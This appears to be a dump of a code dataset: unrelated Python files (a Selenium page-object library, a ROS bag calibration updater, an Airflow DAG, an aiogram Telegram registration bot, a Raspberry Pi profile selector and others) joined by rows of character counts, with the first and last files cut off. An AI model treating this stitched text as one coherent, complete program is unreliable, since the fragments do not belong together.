    """Minimal command-line 'UI': runs the server until keyboard interrupt."""

    def __init__(self, options):
        self.options = options
        self.ev_quit = threading.Event()

    def ui(self, obj):
        """Start *obj*'s servers, block on stdin, and always tear down."""
        obj.start_server(self.options.rohosts.split(','),
                         self.options)
        try:
            try:
                while True:
                    print("Type ^C to exit the server")
                    sys.stdin.readline()
            except KeyboardInterrupt:
                print("Keyboard interrupt!")
        finally:
            # Kill viewers and stop servers even on unexpected errors.
            obj.allViewersOff()
            obj.stop_server()
def add_options(argprs):
    """Register this program's command-line options on the *argprs* parser."""
    argprs.add_argument("--debug", dest="debug", default=False,
                        action="store_true",
                        help="Enter the pdb debugger on main()")
    argprs.add_argument("-c", "--channels", dest="channels", default='sound',
                        metavar="LIST",
                        help="Subscribe to the comma-separated LIST of channels")
    argprs.add_argument("-m", "--monitor", dest="monitor", default='monitor',
                        metavar="NAME",
                        help="Subscribe to feeds from monitor service NAME")
    argprs.add_argument("--monport", dest="monport", type=int,
                        default=default_mon_port, metavar="PORT",
                        help="Use PORT for our monitor")
    argprs.add_argument("--numthreads", dest="numthreads", type=int,
                        default=50, metavar="NUM",
                        help="Use NUM threads in thread pool")
    argprs.add_argument("--port", dest="port", type=int,
                        default=default_svc_port, metavar="PORT",
                        help="Use PORT for our monitor")
    argprs.add_argument("--profile", dest="profile", action="store_true",
                        default=False,
                        help="Run the profiler on main()")
    argprs.add_argument("--rohosts", dest="rohosts", default='localhost',
                        metavar="HOSTLIST",
                        help="Hosts to use for remote objects connection")
    # Add the shared ssdlog logging options.
    ssdlog.addlogopts(argprs)
def main(options, args, ui):
    """Construct the g2Disp callback object and hand it to the chosen UI."""
    myhost = ro.get_myhost(short=False)
    # Service name embeds the host so multiple workstations don't collide.
    basename = 'g2disp-%s' % (myhost.replace('.', '_'))
    logger = ssdlog.make_logger(basename, options)
    # Make our callback object
    mobj = g2Disp(logger=logger, basename=basename)
    ui.ui(mobj)
| 8,196 | 2,412 |
import unittest
from builtins import next
from unittest import mock
from opentuner.search import manipulator
from opentuner.search.composableevolutionarytechniques import ComposableEvolutionaryTechnique
def faked_random(nums):
    """Return a callable that ignores its arguments and yields values from
    *nums* in order, wrapping around forever -- a deterministic stand-in
    for random-number functions in tests."""
    source = fake_random(nums)

    def stub(*_args, **_kwargs):
        return next(source)
    return stub


def fake_random(nums):
    """Generator cycling endlessly over *nums*."""
    idx = 0
    total = len(nums)
    while True:
        yield nums[idx]
        idx = (idx + 1) % total
class EmptyComposableEvolutionaryTechnique(ComposableEvolutionaryTechnique):
    """Minimal concrete subclass used as a fixture by the tests below."""

    def __init__(self, *pargs, **kwargs):
        super(EmptyComposableEvolutionaryTechnique, self).__init__(*pargs, **kwargs)

    def minimum_number_of_parents(self):
        # Arbitrary fixture value; only read by the framework.
        return 4

    def get_parents(self, population):
        # Copy the first member's config so operators cannot mutate the population.
        cfg = self.manipulator.copy(population[0].config)
        return [cfg]

    def update_population(self, config, population):
        # replace the oldest configuration if the new one is better.
        # NOTE(review): the code actually replaces population[0] unconditionally;
        # the comment above restates original intent -- confirm against usage.
        population[0].config = config
        return population
class ComposableSearchTechniqueTests(unittest.TestCase):
    """Tests for ComposableEvolutionaryTechnique's operator-map plumbing."""

    def setUp(self):
        # One mapping registered by class, one by string type name.
        self.operator_map = {}
        ComposableEvolutionaryTechnique.add_to_map(self.operator_map,
                                                   manipulator.PermutationParameter,
                                                   "op3_cross", xchoice='op3_cross_CX')
        ComposableEvolutionaryTechnique.add_to_map(self.operator_map,
                                                   "FloatArray",
                                                   "op3_cross", strength=0.4)
        self.technique = EmptyComposableEvolutionaryTechnique(operator_map=self.operator_map)

    def test_add_to_map(self):
        # add_to_map keys entries by parameter class, resolving string names
        # like "FloatArray" to the manipulator class.
        op_map = {}
        op_map[manipulator.PermutationParameter] = {'op_name': 'op3_cross',
                                                    'args': (),
                                                    'kwargs': {'xchoice': 'op3_cross_CX'}}
        op_map[manipulator.FloatArray] = {'op_name': 'op3_cross',
                                          'args': (),
                                          'kwargs': {'strength': 0.4}}
        self.assertDictEqual(self.operator_map, op_map)

    def test_get_default_operator(self):
        # Renamed from test_get_default_oeprator (typo); still matches the
        # "test_*" discovery pattern, so no runner configuration changes.
        default = self.technique.get_default_operator(manipulator.PermutationParameter)
        self.assertDictEqual(default, {'op_name': 'op1_nop', 'args': [], 'kwargs': {}})

    def test_get_operator(self):
        # Unmapped parameter types fall back to the default no-op operator.
        default = self.technique.get_operator(manipulator.IntegerParameter)
        self.assertDictEqual(default, {'op_name': 'op1_nop', 'args': [], 'kwargs': {}})
        default = self.technique.get_operator(manipulator.PermutationParameter)
        self.assertDictEqual(default, {'op_name': 'op3_cross', 'args': (), 'kwargs': {'xchoice': 'op3_cross_CX'}})

    @mock.patch('opentuner.search.manipulator.PermutationParameter.op3_cross')
    def test_apply_operator(self, op3_cross_func):
        # Only the first three parents (plus mapped kwargs) are forwarded.
        param_instance = manipulator.PermutationParameter('temp', [1, 2, 3, 4, 5])
        self.technique.apply_operator(param_instance, ['p1', 'p2', 'p3', 'p4'])
        op3_cross_func.assert_called_once_with('p1', 'p2', 'p3', xchoice='op3_cross_CX')
# TODO tests for RandomThreeParentsComposableTechnique
| 3,251 | 1,016 |
import functools
import re
import time
from logging import getLogger

from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import TimeoutException, NoSuchElementException
from uritemplate import expand as uriexpand
__version__ = '0.0.4'
logger = getLogger(__name__)
def logged(func):
    """Decorator logging entry (with arguments) and any raised exception.

    Fix: exceptions are now logged and *re-raised*; the original swallowed
    them and implicitly returned None, hiding failures from callers.
    """
    @functools.wraps(func)
    def wrapper(*args, **kwargs):
        logger.info(f"started {func.__qualname__}, params: {args} and {kwargs}")
        try:
            return func(*args, **kwargs)
        except Exception as e:
            logger.exception(e)
            raise
    return wrapper
class Element(object):
    """Descriptor resolving to a single WebElement on every access.

    When the owner carries a non-None ``base_element`` (page sections),
    the lookup is scoped to it; otherwise the whole page is searched.
    """

    def __init__(self, by, selector):
        self.by = by
        self.selector = selector

    def __get__(self, obj, klass):
        scope = getattr(obj, 'base_element', None)
        if scope is None:
            scope = obj.driver
        return scope.find_element(self.by, self.selector)
class Elements(object):
    """Descriptor resolving to the list of matching WebElements on access.

    Scoped to the owner's ``base_element`` when one is set, otherwise the
    whole page via ``driver``.
    """

    def __init__(self, by, selector):
        self.by = by
        self.selector = selector

    def __get__(self, obj, klass):
        scope = getattr(obj, 'base_element', None)
        if scope is None:
            scope = obj.driver
        return scope.find_elements(self.by, self.selector)
class SupportMethodGenerator(object):
    """Factory for the helper methods PageMetaclass injects per declared element.

    Each generator returns an unbound function that runs with the page object
    as *self* (so ``self.driver`` is the page's WebDriver). Unused
    ``this = self`` captures were removed from the generators whose inner
    functions never referenced them.
    """

    def __init__(self, timeout=10):
        # Default wait used by the wait_until_* helpers.
        self.timeout = timeout

    def wait_until_element_visible(self, by, selector):
        """Method waiting for visibility, then returning the element."""
        this = self  # captured only for the default timeout

        def inner(self, timeout=this.timeout):
            wait = WebDriverWait(self.driver, timeout)
            wait.until(
                EC.visibility_of_element_located((by, selector))
            )
            return self.driver.find_element(by, selector)
        return inner

    def wait_until_element_invisible(self, by, selector):
        """Method waiting until the element is gone; returns None."""
        this = self

        def inner(self, timeout=this.timeout):
            wait = WebDriverWait(self.driver, timeout)
            wait.until(
                EC.invisibility_of_element_located((by, selector))
            )
            return None
        return inner

    def wait_until_element_to_be_clickable(self, by, selector):
        """Method waiting until clickable, then returning the element."""
        this = self

        def inner(self, timeout=this.timeout):
            wait = WebDriverWait(self.driver, timeout)
            wait.until(
                EC.element_to_be_clickable((by, selector))
            )
            return self.driver.find_element(by, selector)
        return inner

    def has_element(self, by, selector):
        """Method reporting whether at least one matching element exists."""
        def inner(self):
            try:
                self.driver.find_element(by, selector)
                return True
            except NoSuchElementException:
                return False
        return inner

    def has_no_element(self, by, selector):
        """Method reporting that no matching element exists."""
        def inner(self):
            try:
                self.driver.find_element(by, selector)
                return False
            except NoSuchElementException:
                return True
        return inner

    def element_element(self, by, selector):
        """Method fetching the first matching element.

        NOTE(review): searches via self.driver even on sections -- it ignores
        base_element, unlike the Element descriptor; confirm this is intended.
        """
        def inner(self):
            return self.driver.find_element(by, selector)
        return inner

    def element_elements(self, by, selector):
        """Method fetching all matching elements (base_element is ignored
        here too; see note on element_element)."""
        def inner(self):
            return self.driver.find_elements(by, selector)
        return inner
class Section(object):
    """Descriptor producing a page-section object rooted at a located element."""

    def __init__(self, klass, base_by, base_selector):
        self.klass = klass
        self.base_by = base_by
        self.base_selector = base_selector

    def __get__(self, obj, klass):
        root = obj.driver.find_element(self.base_by, self.base_selector)
        return self.klass(obj.driver, base_element=root)
class Sections(object):
    """Descriptor producing one page-section object per matching root element."""

    def __init__(self, klass, base_by, base_selector):
        self.klass = klass
        self.base_by = base_by
        self.base_selector = base_selector

    def __get__(self, obj, klass):
        roots = obj.driver.find_elements(self.base_by, self.base_selector)
        sections = []
        for root in roots:
            sections.append(self.klass(obj.driver, base_element=root))
        return sections
class Iframe(object):
    """Descriptor producing a page-iframe object for a located iframe element."""

    def __init__(self, klass, base_by, base_selector):
        self.klass = klass
        self.base_by = base_by
        self.base_selector = base_selector

    def __get__(self, obj, klass):
        frame = obj.driver.find_element(self.base_by, self.base_selector)
        return self.klass(obj.driver, iframe_element=frame)
class PageMetaclass(type):
    """Metaclass expanding Element/Elements/Section/Sections/Iframe class
    attributes into generated helper methods (wait_until_*, has_*, *_element(s))."""

    def __new__(cls, name, bases, dict_):
        for k, v in list(dict_.items()):
            if isinstance(v, Element) or isinstance(v, Elements):
                smg = SupportMethodGenerator()
                dict_[f"wait_until_{k}_visible"] = smg.wait_until_element_visible(v.by, v.selector)
                dict_[f"wait_until_{k}_invisible"] = smg.wait_until_element_invisible(v.by, v.selector)
                dict_[f"wait_until_{k}_to_be_clickable"] = smg.wait_until_element_to_be_clickable(v.by, v.selector)
                # Even for Elements, find_element is used underneath, so this
                # checks whether at least one matching element exists.
                dict_[f"has_{k}"] = smg.has_element(v.by, v.selector)
                dict_[f"has_no_{k}"] = smg.has_no_element(v.by, v.selector)
                if isinstance(v, Element):
                    dict_[f"{k}_element"] = smg.element_element(v.by, v.selector)
                elif isinstance(v, Elements):
                    dict_[f"{k}_elements"] = smg.element_elements(v.by, v.selector)
            if isinstance(v, Section) or isinstance(v, Sections) or isinstance(v, Iframe):
                smg = SupportMethodGenerator()
                dict_[f"wait_until_{k}_visible"] = smg.wait_until_element_visible(v.base_by, v.base_selector)
                dict_[f"wait_until_{k}_invisible"] = smg.wait_until_element_invisible(v.base_by, v.base_selector)
                # Even for Sections, find_element is used underneath, so this
                # checks whether at least one matching element exists.
                dict_[f"has_{k}"] = smg.has_element(v.base_by, v.base_selector)
                dict_[f"has_no_{k}"] = smg.has_no_element(v.base_by, v.base_selector)
                if isinstance(v, Section):
                    dict_[f"{k}_element"] = smg.element_element(v.base_by, v.base_selector)
                elif isinstance(v, Sections):
                    dict_[f"{k}_elements"] = smg.element_elements(v.base_by, v.base_selector)
                elif isinstance(v, Iframe):
                    dict_[f"{k}_element"] = smg.element_element(v.base_by, v.base_selector)
        return type.__new__(cls, name, bases, dict_)
class Page(object, metaclass=PageMetaclass):
    """Base page object.

    Subclasses set ``_url`` (a URI template used by load()) and/or
    ``_url_matcher`` (a regex that must fully match the current URL).
    """
    _url = None
    _url_matcher = None

    def __init__(self, driver):
        self.driver = driver

    @logged
    def load(self, **kwargs):
        """Navigate to this page, expanding the _url template with *kwargs*."""
        if self._url:
            uri = uriexpand(self._url, **kwargs)
            self.driver.get(uri)
        else:
            raise Exception(f"Cant load. {self.__class__} has not _url parameter")

    @logged
    def is_loaded(self):
        """Return True when the current URL matches _url_matcher, or equals _url.

        Fix: removed an unreachable duplicate matcher check that followed
        the original if/elif/else (every branch already returned or raised).
        """
        if self._url_matcher:
            return re.fullmatch(self._url_matcher, self.current_url) is not None
        elif self._url:
            return self._url == self.current_url
        else:
            raise Exception(f"Cant load check. {self.__class__} has neither _url and _url_matcher parameter")

    @logged
    def assert_loaded(self):
        """Return True if loaded, otherwise raise."""
        if self.is_loaded():
            return True
        else:
            raise Exception(f"Page {self.__class__} is not loaded.")

    @logged
    def wait_until_page_loaded(self, timeout=10):
        """Poll is_loaded() once per second for up to *timeout* seconds."""
        for i in range(1, timeout+1):
            logger.debug(f"checking page is loaded {i}/{timeout}")
            if self.is_loaded():
                logger.debug(f"page is loaded!")
                break
            time.sleep(1)
        else:
            raise Exception(f"Timeout loading Page {self.__class__}")

    @logged
    def wait_until_page_readystate_is_complete(self, timeout=10):
        """Poll document.readyState once per second until it is 'complete'."""
        for i in range(1, timeout+1):
            logger.debug(f"checking document.readyState {i}/{timeout}")
            if self.driver.execute_script("return document.readyState") == "complete":
                logger.debug(f"document.readyState is complete!")
                break
            time.sleep(1)
        else:
            raise Exception(f"Timeout loading Page {self.__class__}")

    @property
    def current_url(self):
        """The driver's current URL."""
        return self.driver.current_url
class PageSection(object, metaclass=PageMetaclass):
    """Page fragment scoped to *base_element*; Element descriptors declared
    on subclasses search inside it."""

    def __init__(self, driver, base_element):
        self.driver = driver
        self.base_element = base_element

    def __enter__(self):
        return self

    def __exit__(self, *args):
        # No cleanup required; context-manager form mirrors PageIframe's API.
        pass
class PageIframe(object, metaclass=PageMetaclass):
    """Page fragment inside an iframe; entering the context switches the
    driver into the frame, exiting restores the default content."""

    def __init__(self, driver, iframe_element):
        self.driver = driver
        self.iframe_element = iframe_element

    def __enter__(self):
        # Fix: switch_to_frame() was deprecated and removed in Selenium 4;
        # use the switch_to API, matching __exit__ below.
        self.driver.switch_to.frame(self.iframe_element)
        return self

    def __exit__(self, *args):
        self.driver.switch_to.default_content()
| 8,575 | 2,852 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Author : Heethesh Vhavle
Email : heethesh@cmu.edu
Version : 1.0.1
Date : Jan 18, 2019
Description:
Script to update the camera calibration data into the ROSBAG file
Ensure that this file has executable permissions
Example Usage:
$ rosrun lidar_camera_calibration update_camera_info.py rosbag.bag calibration.yaml
Notes:
Make sure this file has executable permissions:
$ chmod +x update_camera_info.py
'''
# Python 2/3 compatibility
from __future__ import print_function
# Built-in modules
import os
import sys
import yaml
# ROS modules
PKG = 'lidar_camera_calibration'
import roslib; roslib.load_manifest(PKG)
import rosbag
import rospy
def load_calibration_data(filename):
    '''Load the camera calibration YAML file and return the parsed dict.

    Logs and exits the program (code 1) if the file cannot be parsed.
    '''
    # Open calibration file
    with open(filename, 'r') as stream:
        try:
            # safe_load: plain yaml.load without a Loader is deprecated and
            # can construct arbitrary Python objects; calibration data only
            # needs plain scalars/lists/dicts.
            calibration = yaml.safe_load(stream)
        except yaml.YAMLError as exc:
            rospy.logerr(exc)
            sys.exit(1)
    return calibration
if __name__ == '__main__':
    # Get parameters when starting node from a launch file.
    # Fix: sys.argv always contains at least the script name, so the
    # original `len(sys.argv) < 1` test could never be true; require both
    # positional arguments before using them.
    if len(sys.argv) < 3:
        BAG_FILE = rospy.get_param('filename')
        CALIB_FILE = rospy.get_param('calib_data')
        CAMERA_INFO = rospy.get_param('camera_info')
    # Get parameters as arguments
    else:
        BAG_FILE = sys.argv[1]
        CALIB_FILE = sys.argv[2]
        CAMERA_INFO = '/sensors/camera/camera_info'

    # Load ROSBAG file
    rospy.loginfo('Bag Filename: %s', BAG_FILE)
    bag = rosbag.Bag(BAG_FILE, 'r')

    # Output file: <name>_updated.bag next to the input bag.
    folder = os.path.dirname(BAG_FILE)
    output_name = os.path.splitext(os.path.basename(BAG_FILE))[0] + '_updated.bag'
    OUTPUT_FILE = os.path.join(folder, output_name)
    # Fix: rosbag.Bag(..., 'w') creates the file itself; the os.mknod call
    # raised FileExistsError on reruns (and needs privileges on some systems).
    output = rosbag.Bag(OUTPUT_FILE, 'w')

    # Load calibration data
    calibration = load_calibration_data(CALIB_FILE)

    # Update calibration data on camera_info messages; copy all others as-is.
    rospy.loginfo('Updating %s data...' % CAMERA_INFO)
    for topic, msg, t in bag.read_messages():
        if topic == CAMERA_INFO:
            msg.D = calibration['distortion_coefficients']['data']
            msg.K = calibration['camera_matrix']['data']
            msg.R = calibration['rectification_matrix']['data']
            msg.P = calibration['projection_matrix']['data']
        # Preserve original timestamps where the message carries a header.
        output.write(topic, msg, msg.header.stamp if msg._has_header else t)
    rospy.loginfo('Done')

    # Close bag file
    bag.close()
    output.close()
| 2,432 | 845 |
from __future__ import division
from numpy.random import RandomState
from numpy_sugar.linalg import sum2diag
from numpy_sugar import epsilon
from numpy_sugar.random import multivariate_normal
class GLMMSampler(object):
    """Sampler for a generalized linear mixed model: draws a latent
    multivariate-normal vector and pushes it through the likelihood."""

    def __init__(self, lik, mean, cov):
        self._lik = lik
        self._mean = mean
        self._cov = cov

    def sample(self, random_state=None):
        """Draw one sample; *random_state* defaults to a fresh RandomState."""
        rng = RandomState() if random_state is None else random_state
        mean_values = self._mean.feed('sample').value()
        cov_matrix = self._cov.feed('sample').value()
        # Jitter the diagonal in place for numerical stability, then undo it.
        sum2diag(cov_matrix, +epsilon.small, out=cov_matrix)
        latent = multivariate_normal(mean_values, cov_matrix, rng)
        sum2diag(cov_matrix, -epsilon.small, out=cov_matrix)
        return self._lik.sample(latent, rng)
| 733 | 238 |
import datetime as dt
from airflow import DAG
from airflow.operators.bash_operator import BashOperator
"""
if catchup=False, then it will not run for past dates that didn't got executed
"""
# Defaults applied to every task in the DAG below.
default_args = {
    'owner': 'airflow',
    'start_date': dt.datetime(2020, 7, 1),
    'concurrency': 1,
    'retries': 0
}
# Daily DAG with two trivial bash tasks: hello runs before bye.
with DAG('simple_dag_backfill',
         default_args=default_args,
         schedule_interval='@daily') as dag:
    task_hello = BashOperator(task_id='hello', bash_command='echo "hello!"')
    task_bye = BashOperator(task_id='bye', bash_command='echo "bye!"')
    task_hello >> task_bye
| 607 | 206 |
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from .device import (
AgentOtherDeviceId,
Device,
DeviceInfo,
DeviceNames,
)
from .homegraph import (
AgentDeviceId,
DeleteAgentUserRequest,
QueryRequest,
QueryRequestInput,
QueryRequestPayload,
QueryResponse,
QueryResponsePayload,
ReportStateAndNotificationDevice,
ReportStateAndNotificationRequest,
ReportStateAndNotificationResponse,
RequestSyncDevicesRequest,
RequestSyncDevicesResponse,
StateAndNotificationPayload,
SyncRequest,
SyncResponse,
SyncResponsePayload,
)
# Public API of this package: the device and homegraph message types
# re-exported by the imports above.
__all__ = (
    'AgentOtherDeviceId',
    'Device',
    'DeviceInfo',
    'DeviceNames',
    'AgentDeviceId',
    'DeleteAgentUserRequest',
    'QueryRequest',
    'QueryRequestInput',
    'QueryRequestPayload',
    'QueryResponse',
    'QueryResponsePayload',
    'ReportStateAndNotificationDevice',
    'ReportStateAndNotificationRequest',
    'ReportStateAndNotificationResponse',
    'RequestSyncDevicesRequest',
    'RequestSyncDevicesResponse',
    'StateAndNotificationPayload',
    'SyncRequest',
    'SyncResponse',
    'SyncResponsePayload',
)
| 1,706 | 491 |
import sys
import time
import RPi.GPIO as GPIO
from application import Application, COMMAND_LINE_PARAM_PROFILE_ID
from profiles import profile_by_id, profile_by_jumper
from . import State
from hardware import PINS_PROFILES
class SensingProfileState(State):
    """Application state that selects which profile to load, either from a
    command-line argument or by sensing a hardware jumper on the profile
    pins."""

    def __load_profile__(self, profile_id, first=True):
        """Load profile ``profile_id``, recursing into composite profiles.

        :param profile_id: identifier understood by ``profile_by_id``.
        :param first: True on the outermost call; resets the app's profile
            list and records the profile name/info before loading.
        :returns: True on success.
        :raises ValueError: if the profile has an unknown ``type``.
        """
        p = profile_by_id(profile_id)
        if first:
            self.app.profiles = []
            self.app.profile_name = profile_id
            self.app.profile_info = p
        self.app.detail('Loading "{}"'.format(profile_id))
        if "plugins" in p:
            # Note: the first plugin entry's conf is applied to every plugin.
            for pl in self.app.plugins:
                pl.load_conf(p["plugins"][0]["conf"])
        if p["type"] == "bin":
            self.app.profiles.append(p)
            return True
        if p["type"] == "composite":
            # A composite profile lists sub-profiles; load each one without
            # resetting the state accumulated so far.
            for p0 in p["profiles"]:
                self.__load_profile__(p0, False)
            return True
        raise ValueError("Unknown profile type {}".format(p["type"]))

    def __init__(self, app):
        super().__init__(app)
        # Jumper pins are inputs with pull-ups: a connected jumper reads low.
        for p in PINS_PROFILES:
            GPIO.setup(p, GPIO.IN, pull_up_down=GPIO.PUD_UP)
        self.app.skip_detect = False
        if len(sys.argv) >= COMMAND_LINE_PARAM_PROFILE_ID + 1:
            profile_id = sys.argv[COMMAND_LINE_PARAM_PROFILE_ID]
            if not profile_id == "_":
                self.app.detail("Using profile from args: {}".format(profile_id))
                # BUG FIX: previously loaded sys.argv[1] regardless of
                # COMMAND_LINE_PARAM_PROFILE_ID; use the parsed id instead.
                self.__load_profile__(profile_id)
                self.app.skip_detect = True
                return
        self.app.detail("Detecting profile by jumper")
        self.message_shown = False

    def do_step(self):
        """Poll the jumper pins once; return True when a profile is loaded."""
        if self.app.skip_detect:
            return True
        # Generalized from a hard-coded range(4) so PINS_PROFILES may hold
        # any number of jumper pins.
        for j in range(len(PINS_PROFILES)):
            p = PINS_PROFILES[j]
            if not GPIO.input(p):  # active-low: jumper connected
                self.app.detail("Detected jumper {}".format(j + 1))
                temp = profile_by_jumper(j + 1)
                profile_id = temp["id"]
                self.__load_profile__(profile_id)
                return True
        time.sleep(0.1)
        if not self.message_shown:
            self.app.print("Connect jumper")
            self.message_shown = True
        return False

    def on_event(self, event):
        """Advance to the firmware-download state once any event arrives."""
        if event:
            return Application.APP_STATE_FIRMWARE_DOWNLOAD
        return self
| 2,348 | 724 |
from aiogram.dispatcher import FSMContext
from aiogram.types import CallbackQuery
from FSM.Registation_states import Registration_form
from constants.text_messages import RULES, START_INFO
from keyboards.inline_kb import bicycle_type, gender, apply_registration, check_reg_answer
from utils.loader import dp, db
# "Rules" button pressed: show the rules text with a registration button.
@dp.callback_query_handler(text='rules')
async def rules(call: CallbackQuery):
    await call.answer(cache_time=55)
    await call.message.edit_text(f'{RULES}', reply_markup=apply_registration)


# "Registration" button pressed: ask for the user's gender.
@dp.callback_query_handler(text='start_reg')
async def reg(call: CallbackQuery):
    await call.message.edit_text(f'Привет {call.from_user.full_name}, укажи свой пол:',
                                 reply_markup=gender)
    await Registration_form.Sex.set()


# Gender chosen: store it and show the bicycle-category keyboard.
@dp.callback_query_handler(state=Registration_form.Sex)
async def choose_sex(call: CallbackQuery, state: FSMContext):
    await call.answer(cache_time=1)
    answer = call.data
    await state.update_data(sex=answer)
    # Persist the choice immediately so it survives FSM resets.
    await db.update_racer_gender(gender=answer, id=call.from_user.id)
    await call.message.edit_text(f'В какой категории участвуешь?', reply_markup=bicycle_type)
    await Registration_form.next()
# Bicycle category chosen: persist it and ask the user to confirm answers.
@dp.callback_query_handler(state=Registration_form.Bicycle_type)
async def choose_bicycle_type(call: CallbackQuery, state: FSMContext):
    await call.answer(cache_time=1)
    answer = call.data
    await db.update_racer_bicycle(bicycle=answer, id=call.from_user.id)  # store in DB
    await state.update_data(bicycle_type=answer)
    data = await state.get_data()
    # Pick a gendered verb form for the confirmation message.
    if data.get('sex') == 'male':
        sex = 'Ты выбрал'
    elif data.get('sex') == 'female':
        sex = 'Ты выбрала'
    else:
        sex = 'Ты еще не определился с полом (участвуешь вне зачета) и выбрал'
    if call.data == 'fixie':
        bicycle = 'фиксы 🚲'
    else:
        bicycle = 'мульти/синглспид 🚴'
    await call.message.edit_text(f'{sex} категорию: {bicycle}', reply_markup=check_reg_answer)
    # Leave the FSM but keep the collected data for the confirmation step.
    await state.reset_state(with_data=False)
# "Data not OK": wipe the stored answers and restart registration.
@dp.callback_query_handler(text='data_not_ok')
async def correcting(call: CallbackQuery, state: FSMContext):
    await call.answer(cache_time=1)
    await state.reset_data()
    await state.reset_state()
    await call.message.edit_text('Укажи еще раз свой пол:', reply_markup=gender)
    await Registration_form.Sex.set()


# "Data OK": registration finished; show where the race starts.
@dp.callback_query_handler(text='data_ok')
async def waiting_start(call: CallbackQuery):
    await call.answer(cache_time=1)
    await call.message.edit_text(START_INFO)
| 2,741 | 983 |
import json
class JSONUtil:
    """Helpers for preparing JSON payloads for multipart requests."""

    @staticmethod
    def multipart_payload(payload):
        """Serialize *payload* into a multipart field tuple.

        Returns a ``(filename, body, content_type)`` triple where the
        filename is ``None`` and the body is the JSON-encoded payload.
        """
        body = json.dumps(payload)
        return (None, body, 'application/json')
| 145 | 43 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Iterate through a pre-sorted text file and return lines as a group.
============================================================================
AUTHOR: Michael D Dacre, mike.dacre@gmail.com
ORGANIZATION: Stanford University
LICENSE: MIT License, property of Stanford, use as you wish
VERSION: 0.1
CREATED: 2016-29-27 16:09
Last modified: 2016-09-27 17:16
============================================================================
"""
import gzip
import bz2
def giterate(infile, groupby, columns=None, sep='\t', header=False,
             pandas=False):
    """Iterate through a pre-sorted text file and yield lines in groups.

    :infile:  The path to a plain text, gzipped, or bzipped text file or a
              file handle.
    :groupby: An integer reference to the column you wish to group on or a
              column name if either header or column names provided.
    :columns: Either None, or an integer count of columns, or a list of
              column names you would like to use to access your data. If an
              integer is provided then the column count is confirmed.
    :header:  If true, first line is used as column names if none provided
              or skipped.
    :pandas:  Yield a pandas dataframe for every group instead of a list of
              lists.
    :yields:  Default is a list of lists for each group. If pandas is True,
              then yields a dataframe for every group.
    :raises ValueError: if a line's field count does not match an integer
              ``columns``, or if ``groupby`` is a string but no column
              names are available.
    """
    if pandas:
        import pandas as pd

    # Normalize `columns` into optional names plus an expected field count.
    if isinstance(columns, list):
        collen = len(columns)
    else:
        collen = columns if isinstance(columns, int) else None
        columns = None

    def finish(rows):
        # Package one completed group in the requested output format.
        if pandas:
            out = pd.DataFrame(rows)
            if columns:
                out.columns = columns
            return out
        return rows

    with open_zipped(infile) as fin:
        if header:
            head = fin.readline()
            if not columns:
                columns = head.rstrip().split(sep)
        # Resolve a column-name groupby into a positional index.
        if isinstance(groupby, str):
            if isinstance(columns, list):
                groupby = columns.index(groupby)
            else:
                raise ValueError("groupby cannot be a string if neither " +
                                 "header nor column names specified")
        grp = []
        key = None  # groupby value of the group currently being accumulated
        for line in fin:
            fields = line.rstrip().split(sep)
            if collen is not None and len(fields) != collen:
                # BUG FIX: the old assert compared the int to the list
                # itself and therefore always failed.
                raise ValueError("Expected {} fields, got {}: {}"
                                 .format(collen, len(fields), fields))
            if key is None or fields[groupby] == key:
                key = fields[groupby]
                grp.append(fields)
            else:
                out = finish(grp)
                grp = [fields]
                # BUG FIX: the group key was never updated before, which
                # split every group after the first into one-line groups.
                key = fields[groupby]
                yield out
        # BUG FIX: the final group used to be silently dropped.
        if grp:
            yield finish(grp)


def open_zipped(infile, mode='r'):
    """ Return file handle of file regardless of zipped or not
        Text mode enforced for compatibility with python2 """
    mode = mode[0] + 't'
    p2mode = mode
    if hasattr(infile, 'write'):
        # Already a file handle; use it as-is.
        return infile
    if isinstance(infile, str):
        if infile.endswith('.gz'):
            return gzip.open(infile, mode)
        if infile.endswith('.bz2'):
            # bz2.open() only exists on python3; fall back to BZ2File.
            if hasattr(bz2, 'open'):
                return bz2.open(infile, mode)
            else:
                return bz2.BZ2File(infile, p2mode)
        return open(infile, p2mode)
| 3,446 | 927 |
# -*- coding: utf-8 -*-
#
# Copyright (c) 2009, Robert Corsaro
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the <ORGANIZATION> nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------------
from trac.core import *
from trac.config import Option
from trac.util.text import to_unicode
from genshi.template import NewTextTemplate
from announcer.distributors.mail import IAnnouncementEmailDecorator
from announcer.util.mail import next_decorator, set_header
